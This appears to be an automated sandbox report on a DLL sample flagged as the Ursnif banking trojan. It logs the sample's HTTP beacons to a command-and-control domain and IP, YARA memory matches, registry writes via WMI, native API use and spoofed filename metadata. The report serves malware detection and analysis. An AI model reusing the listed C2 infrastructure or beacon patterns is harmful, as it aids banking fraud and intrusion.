Source: global traffic HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

System Summary:

PE file has a writeable .text section
Source: 6.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: 6.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1B084 4_2_00F1B084
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F13373 4_2_00F13373
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1294D 4_2_00F1294D
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_00F16C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F165B4 NtMapViewOfSection, 4_2_00F165B4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset, 4_2_00F17562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00F1B2A9 NtQueryVirtualMemory, 4_2_00F1B2A9
Sample file is different than original file name gathered from version info
Source: 6.dll Binary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
Source: 6.dll Binary or memory string: OriginalFilenameNsc.exe. vs 6.dll
Source: 6.dll Binary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
Source: 6.dll Binary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
PE file contains strange resources
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
